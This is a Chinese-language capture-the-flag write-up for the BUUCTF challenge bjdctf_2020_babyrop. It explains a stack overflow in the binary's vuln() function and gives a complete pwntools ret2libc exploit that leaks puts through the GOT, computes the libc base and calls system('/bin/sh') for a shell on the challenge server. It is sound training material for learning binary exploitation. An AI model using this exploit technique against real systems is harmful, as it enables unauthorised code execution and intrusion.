bjdctf_2020_babyrop
使用checksec
查看:
只开启了栈不可执行。
先放进IDA中分析:
- 主程序中给了
vuln()
函数,直接跟进查看。
vuln()
:
return read(0, &buf, 0x64uLL);
:读取用户输入的数据存入buf
变量。
题目思路
-
buf
变量距离rbp0x20
。 -
buf
变量可读入0x64
大小的数据。 -
因此存在栈溢出。
-
且程序中无
system()
函数和/bin/bash
字符串。 -
可以使用ret2libc方式getshell
步骤解析
首先利用栈溢出去泄露函数的真实地址,程序中只有
puts()
函数可以打印,所以只能用这个函数去泄露了,同时泄露的地址也用puts@got
也没问题。
得到
puts()
的真实地址之后就可以计算出libc的基地址,从而得到system()
和/bin/bash
的地址。
再通过一次栈溢出来实现getshell
完整exp
from pwn import *
#start
r = remote("node4.buuoj.cn",26823)
# r = process("../buu/bjdctf_2020_babyrop")
elf = ELF("../buu/bjdctf_2020_babyrop")
libc = ELF("../buu/ubuntu16(64).so")
#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400733
main_addr = elf.symbols['main']
#attack
r.recv()
payload = b'M'*(0x20 + 8) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendline(payload)
puts_addr = u64(r.recv(6).ljust(8, b'\x00'))
print("puts_addr: " + hex(puts_addr))
#libc
base_addr = puts_addr - libc.symbols['puts']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))
print("system_addr: " + hex(system_addr))
print("bin_sh_addr: " + hex(bin_sh_addr))
#attack2
payload = b'M'*(0x20 + 8) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) + p64(main_addr)
r.sendline(payload)
r.interactive()